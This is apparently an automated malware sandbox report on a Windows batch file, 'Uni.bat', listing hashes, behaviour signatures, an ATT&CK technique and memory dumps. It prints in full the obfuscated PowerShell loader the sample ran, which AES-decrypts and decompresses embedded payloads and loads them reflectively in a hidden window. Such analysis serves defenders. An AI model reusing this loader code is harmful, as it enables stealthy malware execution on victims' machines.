73073ff98d229b84b7d857d2934440f0107d960ece080ba1281a0940c740ccb6

Resubmissions

30-09-2023 20:01

230930-yrr4esfb7w 10

30-09-2023 19:56

230930-yn1amagf44 7

Analysis

max time kernel
841s
max time network
844s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
30-09-2023 20:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

12.5MB
MD5

dc6a0e74f0f377f122502fe56f24701e
SHA1

a5a97d00f47d5f577bef14cee5e510c39f51bdbc
SHA256

73073ff98d229b84b7d857d2934440f0107d960ece080ba1281a0940c740ccb6
SHA512

94816734e3bfa98bc57132cbbabc129267498c45f23c0b1846c291248b647ab772e4e59f860ff4abd6cc37fbf8e634202268662c934f7620a1d5530134f4f1f2
SSDEEP

49152:XfB9XOZ4339wz3TuoLYYx+QC7BUssJanETvN7zHOBVk3WAYaeCQyetfUBgvfHMhr:O

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2112	Uni.bat.exe

Loads dropped DLL 1 IoCs

pid	Process
2016	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2112	Uni.bat.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2112	Uni.bat.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 2112	2016	cmd.exe	29
PID 2016 wrote to memory of 2112	2016	cmd.exe	29
PID 2016 wrote to memory of 2112	2016	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
  "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function DArpx($qnEpG){ $MeyaV=[System.Security.Cryptography.Aes]::Create(); $MeyaV.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MeyaV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MeyaV.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3jfJ0ceQHNW+zOdASCdJcp2UJdrgj6xgQaqOdOHTtX4='); $MeyaV.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0XEt1KOt7M59sWCakZeW+Q=='); $oBNgb=$MeyaV.CreateDecryptor(); $return_var=$oBNgb.TransformFinalBlock($qnEpG, 0, $qnEpG.Length); $oBNgb.Dispose(); $MeyaV.Dispose(); $return_var;}function SENsx($qnEpG){ $KJhsl=New-Object System.IO.MemoryStream(,$qnEpG); $sYLBF=New-Object System.IO.MemoryStream; $MTzLH=New-Object System.IO.Compression.GZipStream($KJhsl, [IO.Compression.CompressionMode]::Decompress); $MTzLH.CopyTo($sYLBF); $MTzLH.Dispose(); $KJhsl.Dispose(); $sYLBF.Dispose(); $sYLBF.ToArray();}function GSMSc($qnEpG,$ixwQE){ $yIJbn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$qnEpG); $YnZuk=$yIJbn.EntryPoint; $YnZuk.Invoke($null, $ixwQE);}$uLEkV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($QdFyT in $uLEkV) { if ($QdFyT.StartsWith('SEROXEN')) { $KlCRp=$QdFyT.Substring(7); break; }}$xKNhU=[string[]]$KlCRp.Split('\');$fuwVw=SENsx (DArpx ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($xKNhU[0])));$owJgB=SENsx (DArpx ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($xKNhU[1])));GSMSc $owJgB (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));GSMSc $fuwVw (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Admin\AppData\Local\Temp\Uni.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2112-5-0x000000001B160000-0x000000001B442000-memory.dmp

Filesize
2.9MB

Download
memory/2112-6-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

Filesize
9.6MB

Download
memory/2112-7-0x0000000001D00000-0x0000000001D08000-memory.dmp

Filesize
32KB

Download
memory/2112-9-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2112-8-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

Filesize
9.6MB

Download
memory/2112-10-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2112-11-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2112-12-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2112-13-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

Filesize
9.6MB

Download